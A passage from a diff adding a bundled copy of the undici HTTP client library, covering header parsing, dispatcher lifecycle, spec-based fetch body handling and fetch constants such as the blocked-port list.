parseInt(m[1], 10) * 1000 : null +} + +function parseHeaders (headers, obj = {}) { + // For H2 support + if (!Array.isArray(headers)) return headers + + for (let i = 0; i < headers.length; i += 2) { + const key = headers[i].toString().toLowerCase() + let val = obj[key] + + if (!val) { + if (Array.isArray(headers[i + 1])) { + obj[key] = headers[i + 1].map(x => x.toString('utf8')) + } else { + obj[key] = headers[i + 1].toString('utf8') + } + } else { + if (!Array.isArray(val)) { + val = [val] + obj[key] = val + } + val.push(headers[i + 1].toString('utf8')) + } + } + + // See https://github.com/nodejs/node/pull/46528 + if ('content-length' in obj && 'content-disposition' in obj) { + obj['content-disposition'] = Buffer.from(obj['content-disposition']).toString('latin1') + } + + return obj +} + +function parseRawHeaders (headers) { + const ret = [] + let hasContentLength = false + let contentDispositionIdx = -1 + + for (let n = 0; n < headers.length; n += 2) { + const key = headers[n + 0].toString() + const val = headers[n + 1].toString('utf8') + + if (key.length === 14 && (key === 'content-length' || key.toLowerCase() === 'content-length')) { + ret.push(key, val) + hasContentLength = true + } else if (key.length === 19 && (key === 'content-disposition' || key.toLowerCase() === 'content-disposition')) { + contentDispositionIdx = ret.push(key, val) - 1 + } else { + ret.push(key, val) + } + } + + // See https://github.com/nodejs/node/pull/46528 + if (hasContentLength && contentDispositionIdx !== -1) { + ret[contentDispositionIdx] = Buffer.from(ret[contentDispositionIdx]).toString('latin1') + } + + return ret +} + +function isBuffer (buffer) { + // See, https://github.com/mcollina/undici/pull/319 + return buffer instanceof Uint8Array || Buffer.isBuffer(buffer) +} + +function validateHandler (handler, method, upgrade) { + if (!handler || typeof handler !== 'object') { + throw new InvalidArgumentError('handler must be an object') + } + + if (typeof handler.onConnect !== 
'function') { + throw new InvalidArgumentError('invalid onConnect method') + } + + if (typeof handler.onError !== 'function') { + throw new InvalidArgumentError('invalid onError method') + } + + if (typeof handler.onBodySent !== 'function' && handler.onBodySent !== undefined) { + throw new InvalidArgumentError('invalid onBodySent method') + } + + if (upgrade || method === 'CONNECT') { + if (typeof handler.onUpgrade !== 'function') { + throw new InvalidArgumentError('invalid onUpgrade method') + } + } else { + if (typeof handler.onHeaders !== 'function') { + throw new InvalidArgumentError('invalid onHeaders method') + } + + if (typeof handler.onData !== 'function') { + throw new InvalidArgumentError('invalid onData method') + } + + if (typeof handler.onComplete !== 'function') { + throw new InvalidArgumentError('invalid onComplete method') + } + } +} + +// A body is disturbed if it has been read from and it cannot +// be re-used without losing state or data. +function isDisturbed (body) { + return !!(body && ( + stream.isDisturbed + ? stream.isDisturbed(body) || body[kBodyUsed] // TODO (fix): Why is body[kBodyUsed] needed? + : body[kBodyUsed] || + body.readableDidRead || + (body._readableState && body._readableState.dataEmitted) || + isReadableAborted(body) + )) +} + +function isErrored (body) { + return !!(body && ( + stream.isErrored + ? stream.isErrored(body) + : /state: 'errored'/.test(nodeUtil.inspect(body) + ))) +} + +function isReadable (body) { + return !!(body && ( + stream.isReadable + ? 
stream.isReadable(body) + : /state: 'readable'/.test(nodeUtil.inspect(body) + ))) +} + +function getSocketInfo (socket) { + return { + localAddress: socket.localAddress, + localPort: socket.localPort, + remoteAddress: socket.remoteAddress, + remotePort: socket.remotePort, + remoteFamily: socket.remoteFamily, + timeout: socket.timeout, + bytesWritten: socket.bytesWritten, + bytesRead: socket.bytesRead + } +} + +async function * convertIterableToBuffer (iterable) { + for await (const chunk of iterable) { + yield Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk) + } +} + +let ReadableStream +function ReadableStreamFrom (iterable) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + if (ReadableStream.from) { + return ReadableStream.from(convertIterableToBuffer(iterable)) + } + + let iterator + return new ReadableStream( + { + async start () { + iterator = iterable[Symbol.asyncIterator]() + }, + async pull (controller) { + const { done, value } = await iterator.next() + if (done) { + queueMicrotask(() => { + controller.close() + }) + } else { + const buf = Buffer.isBuffer(value) ? value : Buffer.from(value) + controller.enqueue(new Uint8Array(buf)) + } + return controller.desiredSize > 0 + }, + async cancel (reason) { + await iterator.return() + } + }, + 0 + ) +} + +// The chunk should be a FormData instance and contains +// all the required methods. 
+function isFormDataLike (object) { + return ( + object && + typeof object === 'object' && + typeof object.append === 'function' && + typeof object.delete === 'function' && + typeof object.get === 'function' && + typeof object.getAll === 'function' && + typeof object.has === 'function' && + typeof object.set === 'function' && + object[Symbol.toStringTag] === 'FormData' + ) +} + +function throwIfAborted (signal) { + if (!signal) { return } + if (typeof signal.throwIfAborted === 'function') { + signal.throwIfAborted() + } else { + if (signal.aborted) { + // DOMException not available < v17.0.0 + const err = new Error('The operation was aborted') + err.name = 'AbortError' + throw err + } + } +} + +function addAbortListener (signal, listener) { + if ('addEventListener' in signal) { + signal.addEventListener('abort', listener, { once: true }) + return () => signal.removeEventListener('abort', listener) + } + signal.addListener('abort', listener) + return () => signal.removeListener('abort', listener) +} + +const hasToWellFormed = !!String.prototype.toWellFormed + +/** + * @param {string} val + */ +function toUSVString (val) { + if (hasToWellFormed) { + return `${val}`.toWellFormed() + } else if (nodeUtil.toUSVString) { + return nodeUtil.toUSVString(val) + } + + return `${val}` +} + +// Parsed accordingly to RFC 9110 +// https://www.rfc-editor.org/rfc/rfc9110#field.content-range +function parseRangeHeader (range) { + if (range == null || range === '') return { start: 0, end: null, size: null } + + const m = range ? range.match(/^bytes (\d+)-(\d+)\/(\d+)?$/) : null + return m + ? { + start: parseInt(m[1]), + end: m[2] ? parseInt(m[2]) : null, + size: m[3] ? 
parseInt(m[3]) : null + } + : null +} + +const kEnumerableProperty = Object.create(null) +kEnumerableProperty.enumerable = true + +module.exports = { + kEnumerableProperty, + nop, + isDisturbed, + isErrored, + isReadable, + toUSVString, + isReadableAborted, + isBlobLike, + parseOrigin, + parseURL, + getServerName, + isStream, + isIterable, + isAsyncIterable, + isDestroyed, + parseRawHeaders, + parseHeaders, + parseKeepAliveTimeout, + destroy, + bodyLength, + deepClone, + ReadableStreamFrom, + isBuffer, + validateHandler, + getSocketInfo, + isFormDataLike, + buildURL, + throwIfAborted, + addAbortListener, + parseRangeHeader, + nodeMajor, + nodeMinor, + nodeHasAutoSelectFamily: nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 13), + safeHTTPMethods: ['GET', 'HEAD', 'OPTIONS', 'TRACE'] +} + + +/***/ }), + +/***/ 4839: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Dispatcher = __nccwpck_require__(412) +const { + ClientDestroyedError, + ClientClosedError, + InvalidArgumentError +} = __nccwpck_require__(8045) +const { kDestroy, kClose, kDispatch, kInterceptors } = __nccwpck_require__(2785) + +const kDestroyed = Symbol('destroyed') +const kClosed = Symbol('closed') +const kOnDestroyed = Symbol('onDestroyed') +const kOnClosed = Symbol('onClosed') +const kInterceptedDispatch = Symbol('Intercepted Dispatch') + +class DispatcherBase extends Dispatcher { + constructor () { + super() + + this[kDestroyed] = false + this[kOnDestroyed] = null + this[kClosed] = false + this[kOnClosed] = [] + } + + get destroyed () { + return this[kDestroyed] + } + + get closed () { + return this[kClosed] + } + + get interceptors () { + return this[kInterceptors] + } + + set interceptors (newInterceptors) { + if (newInterceptors) { + for (let i = newInterceptors.length - 1; i >= 0; i--) { + const interceptor = this[kInterceptors][i] + if (typeof interceptor !== 'function') { + throw new InvalidArgumentError('interceptor must be an function') + } 
+ } + } + + this[kInterceptors] = newInterceptors + } + + close (callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + this.close((err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (this[kDestroyed]) { + queueMicrotask(() => callback(new ClientDestroyedError(), null)) + return + } + + if (this[kClosed]) { + if (this[kOnClosed]) { + this[kOnClosed].push(callback) + } else { + queueMicrotask(() => callback(null, null)) + } + return + } + + this[kClosed] = true + this[kOnClosed].push(callback) + + const onClosed = () => { + const callbacks = this[kOnClosed] + this[kOnClosed] = null + for (let i = 0; i < callbacks.length; i++) { + callbacks[i](null, null) + } + } + + // Should not error. + this[kClose]() + .then(() => this.destroy()) + .then(() => { + queueMicrotask(onClosed) + }) + } + + destroy (err, callback) { + if (typeof err === 'function') { + callback = err + err = null + } + + if (callback === undefined) { + return new Promise((resolve, reject) => { + this.destroy(err, (err, data) => { + return err ? /* istanbul ignore next: should never error */ reject(err) : resolve(data) + }) + }) + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (this[kDestroyed]) { + if (this[kOnDestroyed]) { + this[kOnDestroyed].push(callback) + } else { + queueMicrotask(() => callback(null, null)) + } + return + } + + if (!err) { + err = new ClientDestroyedError() + } + + this[kDestroyed] = true + this[kOnDestroyed] = this[kOnDestroyed] || [] + this[kOnDestroyed].push(callback) + + const onDestroyed = () => { + const callbacks = this[kOnDestroyed] + this[kOnDestroyed] = null + for (let i = 0; i < callbacks.length; i++) { + callbacks[i](null, null) + } + } + + // Should not error. 
+ this[kDestroy](err).then(() => { + queueMicrotask(onDestroyed) + }) + } + + [kInterceptedDispatch] (opts, handler) { + if (!this[kInterceptors] || this[kInterceptors].length === 0) { + this[kInterceptedDispatch] = this[kDispatch] + return this[kDispatch](opts, handler) + } + + let dispatch = this[kDispatch].bind(this) + for (let i = this[kInterceptors].length - 1; i >= 0; i--) { + dispatch = this[kInterceptors][i](dispatch) + } + this[kInterceptedDispatch] = dispatch + return dispatch(opts, handler) + } + + dispatch (opts, handler) { + if (!handler || typeof handler !== 'object') { + throw new InvalidArgumentError('handler must be an object') + } + + try { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('opts must be an object.') + } + + if (this[kDestroyed] || this[kOnDestroyed]) { + throw new ClientDestroyedError() + } + + if (this[kClosed]) { + throw new ClientClosedError() + } + + return this[kInterceptedDispatch](opts, handler) + } catch (err) { + if (typeof handler.onError !== 'function') { + throw new InvalidArgumentError('invalid onError method') + } + + handler.onError(err) + + return false + } + } +} + +module.exports = DispatcherBase + + +/***/ }), + +/***/ 412: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const EventEmitter = __nccwpck_require__(2361) + +class Dispatcher extends EventEmitter { + dispatch () { + throw new Error('not implemented') + } + + close () { + throw new Error('not implemented') + } + + destroy () { + throw new Error('not implemented') + } +} + +module.exports = Dispatcher + + +/***/ }), + +/***/ 1472: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Busboy = __nccwpck_require__(727) +const util = __nccwpck_require__(3983) +const { + ReadableStreamFrom, + isBlobLike, + isReadableStreamLike, + readableStreamClose, + createDeferredPromise, + fullyReadBody +} = __nccwpck_require__(2538) +const { FormData } = 
__nccwpck_require__(2015) +const { kState } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { DOMException, structuredClone } = __nccwpck_require__(1037) +const { Blob, File: NativeFile } = __nccwpck_require__(4300) +const { kBodyUsed } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { isErrored } = __nccwpck_require__(3983) +const { isUint8Array, isArrayBuffer } = __nccwpck_require__(9830) +const { File: UndiciFile } = __nccwpck_require__(8511) +const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) + +let ReadableStream = globalThis.ReadableStream + +/** @type {globalThis['File']} */ +const File = NativeFile ?? UndiciFile +const textEncoder = new TextEncoder() +const textDecoder = new TextDecoder() + +// https://fetch.spec.whatwg.org/#concept-bodyinit-extract +function extractBody (object, keepalive = false) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + // 1. Let stream be null. + let stream = null + + // 2. If object is a ReadableStream object, then set stream to object. + if (object instanceof ReadableStream) { + stream = object + } else if (isBlobLike(object)) { + // 3. Otherwise, if object is a Blob object, set stream to the + // result of running object’s get stream. + stream = object.stream() + } else { + // 4. Otherwise, set stream to a new ReadableStream object, and set + // up stream. + stream = new ReadableStream({ + async pull (controller) { + controller.enqueue( + typeof source === 'string' ? textEncoder.encode(source) : source + ) + queueMicrotask(() => readableStreamClose(controller)) + }, + start () {}, + type: undefined + }) + } + + // 5. Assert: stream is a ReadableStream object. + assert(isReadableStreamLike(stream)) + + // 6. Let action be null. + let action = null + + // 7. Let source be null. + let source = null + + // 8. Let length be null. + let length = null + + // 9. Let type be null. 
+ let type = null + + // 10. Switch on object: + if (typeof object === 'string') { + // Set source to the UTF-8 encoding of object. + // Note: setting source to a Uint8Array here breaks some mocking assumptions. + source = object + + // Set type to `text/plain;charset=UTF-8`. + type = 'text/plain;charset=UTF-8' + } else if (object instanceof URLSearchParams) { + // URLSearchParams + + // spec says to run application/x-www-form-urlencoded on body.list + // this is implemented in Node.js as apart of an URLSearchParams instance toString method + // See: https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L490 + // and https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L1100 + + // Set source to the result of running the application/x-www-form-urlencoded serializer with object’s list. + source = object.toString() + + // Set type to `application/x-www-form-urlencoded;charset=UTF-8`. + type = 'application/x-www-form-urlencoded;charset=UTF-8' + } else if (isArrayBuffer(object)) { + // BufferSource/ArrayBuffer + + // Set source to a copy of the bytes held by object. + source = new Uint8Array(object.slice()) + } else if (ArrayBuffer.isView(object)) { + // BufferSource/ArrayBufferView + + // Set source to a copy of the bytes held by object. + source = new Uint8Array(object.buffer.slice(object.byteOffset, object.byteOffset + object.byteLength)) + } else if (util.isFormDataLike(object)) { + const boundary = `----formdata-undici-0${`${Math.floor(Math.random() * 1e11)}`.padStart(11, '0')}` + const prefix = `--${boundary}\r\nContent-Disposition: form-data` + + /*! formdata-polyfill. MIT License. 
Jimmy Wärting */ + const escape = (str) => + str.replace(/\n/g, '%0A').replace(/\r/g, '%0D').replace(/"/g, '%22') + const normalizeLinefeeds = (value) => value.replace(/\r?\n|\r/g, '\r\n') + + // Set action to this step: run the multipart/form-data + // encoding algorithm, with object’s entry list and UTF-8. + // - This ensures that the body is immutable and can't be changed afterwords + // - That the content-length is calculated in advance. + // - And that all parts are pre-encoded and ready to be sent. + + const blobParts = [] + const rn = new Uint8Array([13, 10]) // '\r\n' + length = 0 + let hasUnknownSizeValue = false + + for (const [name, value] of object) { + if (typeof value === 'string') { + const chunk = textEncoder.encode(prefix + + `; name="${escape(normalizeLinefeeds(name))}"` + + `\r\n\r\n${normalizeLinefeeds(value)}\r\n`) + blobParts.push(chunk) + length += chunk.byteLength + } else { + const chunk = textEncoder.encode(`${prefix}; name="${escape(normalizeLinefeeds(name))}"` + + (value.name ? `; filename="${escape(value.name)}"` : '') + '\r\n' + + `Content-Type: ${ + value.type || 'application/octet-stream' + }\r\n\r\n`) + blobParts.push(chunk, value, rn) + if (typeof value.size === 'number') { + length += chunk.byteLength + value.size + rn.byteLength + } else { + hasUnknownSizeValue = true + } + } + } + + const chunk = textEncoder.encode(`--${boundary}--`) + blobParts.push(chunk) + length += chunk.byteLength + if (hasUnknownSizeValue) { + length = null + } + + // Set source to object. + source = object + + action = async function * () { + for (const part of blobParts) { + if (part.stream) { + yield * part.stream() + } else { + yield part + } + } + } + + // Set type to `multipart/form-data; boundary=`, + // followed by the multipart/form-data boundary string generated + // by the multipart/form-data encoding algorithm. + type = 'multipart/form-data; boundary=' + boundary + } else if (isBlobLike(object)) { + // Blob + + // Set source to object. 
+ source = object + + // Set length to object’s size. + length = object.size + + // If object’s type attribute is not the empty byte sequence, set + // type to its value. + if (object.type) { + type = object.type + } + } else if (typeof object[Symbol.asyncIterator] === 'function') { + // If keepalive is true, then throw a TypeError. + if (keepalive) { + throw new TypeError('keepalive') + } + + // If object is disturbed or locked, then throw a TypeError. + if (util.isDisturbed(object) || object.locked) { + throw new TypeError( + 'Response body object should not be disturbed or locked' + ) + } + + stream = + object instanceof ReadableStream ? object : ReadableStreamFrom(object) + } + + // 11. If source is a byte sequence, then set action to a + // step that returns source and length to source’s length. + if (typeof source === 'string' || util.isBuffer(source)) { + length = Buffer.byteLength(source) + } + + // 12. If action is non-null, then run these steps in in parallel: + if (action != null) { + // Run action. + let iterator + stream = new ReadableStream({ + async start () { + iterator = action(object)[Symbol.asyncIterator]() + }, + async pull (controller) { + const { value, done } = await iterator.next() + if (done) { + // When running action is done, close stream. + queueMicrotask(() => { + controller.close() + }) + } else { + // Whenever one or more bytes are available and stream is not errored, + // enqueue a Uint8Array wrapping an ArrayBuffer containing the available + // bytes into stream. + if (!isErrored(stream)) { + controller.enqueue(new Uint8Array(value)) + } + } + return controller.desiredSize > 0 + }, + async cancel (reason) { + await iterator.return() + }, + type: undefined + }) + } + + // 13. Let body be a body whose stream is stream, source is source, + // and length is length. + const body = { stream, source, length } + + // 14. Return (body, type). 
+ return [body, type] +} + +// https://fetch.spec.whatwg.org/#bodyinit-safely-extract +function safelyExtractBody (object, keepalive = false) { + if (!ReadableStream) { + // istanbul ignore next + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + // To safely extract a body and a `Content-Type` value from + // a byte sequence or BodyInit object object, run these steps: + + // 1. If object is a ReadableStream object, then: + if (object instanceof ReadableStream) { + // Assert: object is neither disturbed nor locked. + // istanbul ignore next + assert(!util.isDisturbed(object), 'The body has already been consumed.') + // istanbul ignore next + assert(!object.locked, 'The stream is locked.') + } + + // 2. Return the results of extracting object. + return extractBody(object, keepalive) +} + +function cloneBody (body) { + // To clone a body body, run these steps: + + // https://fetch.spec.whatwg.org/#concept-body-clone + + // 1. Let « out1, out2 » be the result of teeing body’s stream. + const [out1, out2] = body.stream.tee() + const out2Clone = structuredClone(out2, { transfer: [out2] }) + // This, for whatever reasons, unrefs out2Clone which allows + // the process to exit by itself. + const [, finalClone] = out2Clone.tee() + + // 2. Set body’s stream to out1. + body.stream = out1 + + // 3. Return a body whose stream is out2 and other members are copied from body. + return { + stream: finalClone, + length: body.length, + source: body.source + } +} + +async function * consumeBody (body) { + if (body) { + if (isUint8Array(body)) { + yield body + } else { + const stream = body.stream + + if (util.isDisturbed(stream)) { + throw new TypeError('The body has already been consumed.') + } + + if (stream.locked) { + throw new TypeError('The stream is locked.') + } + + // Compat. 
+ stream[kBodyUsed] = true + + yield * stream + } + } +} + +function throwIfAborted (state) { + if (state.aborted) { + throw new DOMException('The operation was aborted.', 'AbortError') + } +} + +function bodyMixinMethods (instance) { + const methods = { + blob () { + // The blob() method steps are to return the result of + // running consume body with this and the following step + // given a byte sequence bytes: return a Blob whose + // contents are bytes and whose type attribute is this’s + // MIME type. + return specConsumeBody(this, (bytes) => { + let mimeType = bodyMimeType(this) + + if (mimeType === 'failure') { + mimeType = '' + } else if (mimeType) { + mimeType = serializeAMimeType(mimeType) + } + + // Return a Blob whose contents are bytes and type attribute + // is mimeType. + return new Blob([bytes], { type: mimeType }) + }, instance) + }, + + arrayBuffer () { + // The arrayBuffer() method steps are to return the result + // of running consume body with this and the following step + // given a byte sequence bytes: return a new ArrayBuffer + // whose contents are bytes. + return specConsumeBody(this, (bytes) => { + return new Uint8Array(bytes).buffer + }, instance) + }, + + text () { + // The text() method steps are to return the result of running + // consume body with this and UTF-8 decode. + return specConsumeBody(this, utf8DecodeBytes, instance) + }, + + json () { + // The json() method steps are to return the result of running + // consume body with this and parse JSON from bytes. 
+ return specConsumeBody(this, parseJSONFromBytes, instance) + }, + + async formData () { + webidl.brandCheck(this, instance) + + throwIfAborted(this[kState]) + + const contentType = this.headers.get('Content-Type') + + // If mimeType’s essence is "multipart/form-data", then: + if (/multipart\/form-data/.test(contentType)) { + const headers = {} + for (const [key, value] of this.headers) headers[key.toLowerCase()] = value + + const responseFormData = new FormData() + + let busboy + + try { + busboy = new Busboy({ + headers, + preservePath: true + }) + } catch (err) { + throw new DOMException(`${err}`, 'AbortError') + } + + busboy.on('field', (name, value) => { + responseFormData.append(name, value) + }) + busboy.on('file', (name, value, filename, encoding, mimeType) => { + const chunks = [] + + if (encoding === 'base64' || encoding.toLowerCase() === 'base64') { + let base64chunk = '' + + value.on('data', (chunk) => { + base64chunk += chunk.toString().replace(/[\r\n]/gm, '') + + const end = base64chunk.length - base64chunk.length % 4 + chunks.push(Buffer.from(base64chunk.slice(0, end), 'base64')) + + base64chunk = base64chunk.slice(end) + }) + value.on('end', () => { + chunks.push(Buffer.from(base64chunk, 'base64')) + responseFormData.append(name, new File(chunks, filename, { type: mimeType })) + }) + } else { + value.on('data', (chunk) => { + chunks.push(chunk) + }) + value.on('end', () => { + responseFormData.append(name, new File(chunks, filename, { type: mimeType })) + }) + } + }) + + const busboyResolve = new Promise((resolve, reject) => { + busboy.on('finish', resolve) + busboy.on('error', (err) => reject(new TypeError(err))) + }) + + if (this.body !== null) for await (const chunk of consumeBody(this[kState].body)) busboy.write(chunk) + busboy.end() + await busboyResolve + + return responseFormData + } else if (/application\/x-www-form-urlencoded/.test(contentType)) { + // Otherwise, if mimeType’s essence is "application/x-www-form-urlencoded", then: + + // 1. 
Let entries be the result of parsing bytes. + let entries + try { + let text = '' + // application/x-www-form-urlencoded parser will keep the BOM. + // https://url.spec.whatwg.org/#concept-urlencoded-parser + // Note that streaming decoder is stateful and cannot be reused + const streamingDecoder = new TextDecoder('utf-8', { ignoreBOM: true }) + + for await (const chunk of consumeBody(this[kState].body)) { + if (!isUint8Array(chunk)) { + throw new TypeError('Expected Uint8Array chunk') + } + text += streamingDecoder.decode(chunk, { stream: true }) + } + text += streamingDecoder.decode() + entries = new URLSearchParams(text) + } catch (err) { + // istanbul ignore next: Unclear when new URLSearchParams can fail on a string. + // 2. If entries is failure, then throw a TypeError. + throw Object.assign(new TypeError(), { cause: err }) + } + + // 3. Return a new FormData object whose entries are entries. + const formData = new FormData() + for (const [name, value] of entries) { + formData.append(name, value) + } + return formData + } else { + // Wait a tick before checking if the request has been aborted. + // Otherwise, a TypeError can be thrown when an AbortError should. + await Promise.resolve() + + throwIfAborted(this[kState]) + + // Otherwise, throw a TypeError. + throw webidl.errors.exception({ + header: `${instance.name}.formData`, + message: 'Could not parse content as FormData.' + }) + } + } + } + + return methods +} + +function mixinBody (prototype) { + Object.assign(prototype.prototype, bodyMixinMethods(prototype)) +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-body-consume-body + * @param {Response|Request} object + * @param {(value: unknown) => unknown} convertBytesToJSValue + * @param {Response|Request} instance + */ +async function specConsumeBody (object, convertBytesToJSValue, instance) { + webidl.brandCheck(object, instance) + + throwIfAborted(object[kState]) + + // 1. 
If object is unusable, then return a promise rejected + // with a TypeError. + if (bodyUnusable(object[kState].body)) { + throw new TypeError('Body is unusable') + } + + // 2. Let promise be a new promise. + const promise = createDeferredPromise() + + // 3. Let errorSteps given error be to reject promise with error. + const errorSteps = (error) => promise.reject(error) + + // 4. Let successSteps given a byte sequence data be to resolve + // promise with the result of running convertBytesToJSValue + // with data. If that threw an exception, then run errorSteps + // with that exception. + const successSteps = (data) => { + try { + promise.resolve(convertBytesToJSValue(data)) + } catch (e) { + errorSteps(e) + } + } + + // 5. If object’s body is null, then run successSteps with an + // empty byte sequence. + if (object[kState].body == null) { + successSteps(new Uint8Array()) + return promise.promise + } + + // 6. Otherwise, fully read object’s body given successSteps, + // errorSteps, and object’s relevant global object. + await fullyReadBody(object[kState].body, successSteps, errorSteps) + + // 7. Return promise. + return promise.promise +} + +// https://fetch.spec.whatwg.org/#body-unusable +function bodyUnusable (body) { + // An object including the Body interface mixin is + // said to be unusable if its body is non-null and + // its body’s stream is disturbed or locked. + return body != null && (body.stream.locked || util.isDisturbed(body.stream)) +} + +/** + * @see https://encoding.spec.whatwg.org/#utf-8-decode + * @param {Buffer} buffer + */ +function utf8DecodeBytes (buffer) { + if (buffer.length === 0) { + return '' + } + + // 1. Let buffer be the result of peeking three bytes from + // ioQueue, converted to a byte sequence. + + // 2. If buffer is 0xEF 0xBB 0xBF, then read three + // bytes from ioQueue. (Do nothing with those bytes.) + if (buffer[0] === 0xEF && buffer[1] === 0xBB && buffer[2] === 0xBF) { + buffer = buffer.subarray(3) + } + + // 3. 
Process a queue with an instance of UTF-8’s + // decoder, ioQueue, output, and "replacement". + const output = textDecoder.decode(buffer) + + // 4. Return output. + return output +} + +/** + * @see https://infra.spec.whatwg.org/#parse-json-bytes-to-a-javascript-value + * @param {Uint8Array} bytes + */ +function parseJSONFromBytes (bytes) { + return JSON.parse(utf8DecodeBytes(bytes)) +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-body-mime-type + * @param {import('./response').Response|import('./request').Request} object + */ +function bodyMimeType (object) { + const { headersList } = object[kState] + const contentType = headersList.get('content-type') + + if (contentType === null) { + return 'failure' + } + + return parseMIMEType(contentType) +} + +module.exports = { + extractBody, + safelyExtractBody, + cloneBody, + mixinBody +} + + +/***/ }), + +/***/ 1037: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { MessageChannel, receiveMessageOnPort } = __nccwpck_require__(1267) + +const corsSafeListedMethods = ['GET', 'HEAD', 'POST'] +const corsSafeListedMethodsSet = new Set(corsSafeListedMethods) + +const nullBodyStatus = [101, 204, 205, 304] + +const redirectStatus = [301, 302, 303, 307, 308] +const redirectStatusSet = new Set(redirectStatus) + +// https://fetch.spec.whatwg.org/#block-bad-port +const badPorts = [ + '1', '7', '9', '11', '13', '15', '17', '19', '20', '21', '22', '23', '25', '37', '42', '43', '53', '69', '77', '79', + '87', '95', '101', '102', '103', '104', '109', '110', '111', '113', '115', '117', '119', '123', '135', '137', + '139', '143', '161', '179', '389', '427', '465', '512', '513', '514', '515', '526', '530', '531', '532', + '540', '548', '554', '556', '563', '587', '601', '636', '989', '990', '993', '995', '1719', '1720', '1723', + '2049', '3659', '4045', '5060', '5061', '6000', '6566', '6665', '6666', '6667', '6668', '6669', '6697', + '10080' +] + +const badPortsSet = new 
Set(badPorts) + +// https://w3c.github.io/webappsec-referrer-policy/#referrer-policies +const referrerPolicy = [ + '', + 'no-referrer', + 'no-referrer-when-downgrade', + 'same-origin', + 'origin', + 'strict-origin', + 'origin-when-cross-origin', + 'strict-origin-when-cross-origin', + 'unsafe-url' +] +const referrerPolicySet = new Set(referrerPolicy) + +const requestRedirect = ['follow', 'manual', 'error'] + +const safeMethods = ['GET', 'HEAD', 'OPTIONS', 'TRACE'] +const safeMethodsSet = new Set(safeMethods) + +const requestMode = ['navigate', 'same-origin', 'no-cors', 'cors'] + +const requestCredentials = ['omit', 'same-origin', 'include'] + +const requestCache = [ + 'default', + 'no-store', + 'reload', + 'no-cache', + 'force-cache', + 'only-if-cached' +] + +// https://fetch.spec.whatwg.org/#request-body-header-name +const requestBodyHeader = [ + 'content-encoding', + 'content-language', + 'content-location', + 'content-type', + // See https://github.com/nodejs/undici/issues/2021 + // 'Content-Length' is a forbidden header name, which is typically + // removed in the Headers implementation. However, undici doesn't + // filter out headers, so we add it here. + 'content-length' +] + +// https://fetch.spec.whatwg.org/#enumdef-requestduplex +const requestDuplex = [ + 'half' +] + +// http://fetch.spec.whatwg.org/#forbidden-method +const forbiddenMethods = ['CONNECT', 'TRACE', 'TRACK'] +const forbiddenMethodsSet = new Set(forbiddenMethods) + +const subresource = [ + 'audio', + 'audioworklet', + 'font', + 'image', + 'manifest', + 'paintworklet', + 'script', + 'style', + 'track', + 'video', + 'xslt', + '' +] +const subresourceSet = new Set(subresource) + +/** @type {globalThis['DOMException']} */ +const DOMException = globalThis.DOMException ?? (() => { + // DOMException was only made a global in Node v17.0.0, + // but fetch supports >= v16.8. 
+ try { + atob('~') + } catch (err) { + return Object.getPrototypeOf(err).constructor + } +})() + +let channel + +/** @type {globalThis['structuredClone']} */ +const structuredClone = + globalThis.structuredClone ?? + // https://github.com/nodejs/node/blob/b27ae24dcc4251bad726d9d84baf678d1f707fed/lib/internal/structured_clone.js + // structuredClone was added in v17.0.0, but fetch supports v16.8 + function structuredClone (value, options = undefined) { + if (arguments.length === 0) { + throw new TypeError('missing argument') + } + + if (!channel) { + channel = new MessageChannel() + } + channel.port1.unref() + channel.port2.unref() + channel.port1.postMessage(value, options?.transfer) + return receiveMessageOnPort(channel.port2).message + } + +module.exports = { + DOMException, + structuredClone, + subresource, + forbiddenMethods, + requestBodyHeader, + referrerPolicy, + requestRedirect, + requestMode, + requestCredentials, + requestCache, + redirectStatus, + corsSafeListedMethods, + nullBodyStatus, + safeMethods, + badPorts, + requestDuplex, + subresourceSet, + badPortsSet, + redirectStatusSet, + corsSafeListedMethodsSet, + safeMethodsSet, + forbiddenMethodsSet, + referrerPolicySet +} + + +/***/ }), + +/***/ 685: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) +const { atob } = __nccwpck_require__(4300) +const { isomorphicDecode } = __nccwpck_require__(2538) + +const encoder = new TextEncoder() + +/** + * @see https://mimesniff.spec.whatwg.org/#http-token-code-point + */ +const HTTP_TOKEN_CODEPOINTS = /^[!#$%&'*+-.^_|~A-Za-z0-9]+$/ +const HTTP_WHITESPACE_REGEX = /(\u000A|\u000D|\u0009|\u0020)/ // eslint-disable-line +/** + * @see https://mimesniff.spec.whatwg.org/#http-quoted-string-token-code-point + */ +const HTTP_QUOTED_STRING_TOKENS = /[\u0009|\u0020-\u007E|\u0080-\u00FF]/ // eslint-disable-line + +// https://fetch.spec.whatwg.org/#data-url-processor +/** @param {URL} dataURL */ +function 
